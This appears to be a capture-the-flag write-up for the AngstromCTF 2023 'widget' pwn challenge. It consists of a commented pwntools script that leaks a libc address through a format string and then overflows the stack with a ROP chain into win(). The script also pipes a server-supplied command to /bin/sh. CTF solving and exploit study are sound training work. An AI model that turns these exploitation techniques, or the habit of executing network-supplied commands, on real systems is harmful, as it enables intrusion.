





widget

05/04/2023

By: unvariant

Tags: pwn AngstromCTF-2023

Problem Description:

I seem to have lost my gadgets.

Hints:


Solve script
from pwn import *

# Solve script for the "widget" pwn challenge. Two stages are sent to the
# target: the first leaks a libc address through a format string, the second
# returns into the binary's win() via a short ROP chain.

# Load the challenge binary so GOT entries and symbols (file.got["puts"],
# file.symbols["win"] below) can be resolved by name. The hard-coded
# 0x40xxxx addresses further down also come from this binary; re-check them
# against the local copy if the script is reused.
file = ELF("./widget")

if args.REMOTE:
    io = remote("challs.actf.co", 31320)
    # The first line from the server is split on ": " and the second field is
    # executed as a shell command; presumably this is the server's
    # proof-of-work challenge command. NOTE(review): this runs a string taken
    # straight from the network through /bin/sh -c, so the script fully trusts
    # the challenge host. Also, `pow` shadows the Python builtin of that name.
    pow = io.recvline().split(b": ")[1]
    pow = process(["/bin/sh", "-c", pow])
    # The first output line of that command is sent back as the answer.
    res = pow.recvline()
    print(res)
    io.sendline(res)
else:
    io = process("./widget")

# Binary-local addresses (the binary appears to be non-PIE, given the fixed
# 0x40xxxx values): a plain `ret` gadget, the address of main, and a
# writable address used as a fake saved rbp.
ret = 0x4014c7
main = 0x4013d9
bp = 0x404800

# Stage 1 payload (0x30 bytes):
#   [0x00] "%10$s" padded with NULs to 16 bytes  -> format string
#   [0x10] address of puts@GOT                   -> pointer read by %10$s
#   [0x18] "A" padding up to 0x20
#   [0x20] bp                                    -> presumably overwrites saved rbp
#   [0x28] main                                  -> presumably overwrites the return
#                                                   address so main runs again
# %10$s prints the string at the 10th positional printf argument; the script
# assumes that argument lands on the GOT pointer placed at buffer offset 16
# (the argument index was presumably found by experiment — verify if the
# stack layout changes).
attack =  b"%10$s".ljust(16, b"\x00") + p64(file.got["puts"])
attack =  attack.ljust(0x20, b"A")
attack += p64(bp) + p64(main)

# The program first asks for a length, then for the data itself (both prompts
# end in ": ", which is all recvuntil relies on).
io.recvuntil(b": ")
io.sendline(str(len(attack)).encode())

io.recvuntil(b": ")
io.send(attack)

# The echoed input contains the raw bytes of puts@GOT, i.e. the libc address
# of puts, terminated by the next prompt word "Amount". The bytes are
# zero-padded to 8 and decoded as a little-endian u64.
io.recvuntil(b"Your input: ")
leak = io.recvuntil(b"Amount").strip(b"Amount")
leak = u64(leak.ljust(8, b"\x00"))
print(f"leak: {leak:x}")
# 0x80ed0 is presumably the offset of puts inside the challenge's libc; the
# result is the libc load base.
base = leak - 0x80ed0
print(f"base: {base:x}")

# Pause so a debugger can be attached before the second stage is sent.
input("wait: ")

# libc-relative gadget offsets; the names suggest `pop rdi; ret` and
# `pop rsi; ret` gadgets (not verifiable from this script alone).
rdi = 0x2a3e5
rsi = 0x2be51
# Stage 2 payload: 0x28 bytes of padding to reach the return address, then a
# ROP chain that loads two binary-resident addresses (0x402008, 0x402029 —
# presumably string constants win() expects) into rdi and rsi, executes a
# lone `ret` (presumably to fix 16-byte stack alignment before the call),
# and finally jumps to win().
attack = b"A" * 0x28 + p64(base + rdi) + p64(0x402008) + p64(base + rsi) + p64(0x402029) + p64(ret) + p64(file.symbols["win"])

# Same length-then-data protocol as stage 1; this round is served by the
# re-entered main.
io.recvuntil(b": ")
io.sendline(str(len(attack)).encode())

io.recvuntil(b": ")
io.send(attack)

# Hand the connection over to the user once the chain has run.
io.interactive()